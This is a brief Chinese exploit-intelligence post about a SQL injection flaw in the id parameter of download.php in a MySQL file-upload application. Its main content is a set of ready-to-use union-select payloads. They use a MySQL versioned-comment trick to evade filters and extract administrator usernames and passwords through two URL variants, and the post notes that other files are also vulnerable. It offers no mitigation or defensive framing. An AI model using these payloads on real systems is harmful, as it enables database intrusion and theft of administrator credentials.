首页漏洞情报 MySQL文件上传-ID参数SQL注入

MySQL文件上传-ID参数SQL注入

Hedysx 8 年前

SQL Injection/Exploit :

# http://localhost/[PATH]/download.php?id=[SQL]&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...

0

Hedysx

用自己的眼睛去读世间这一部书。

评论 (0)

发表评论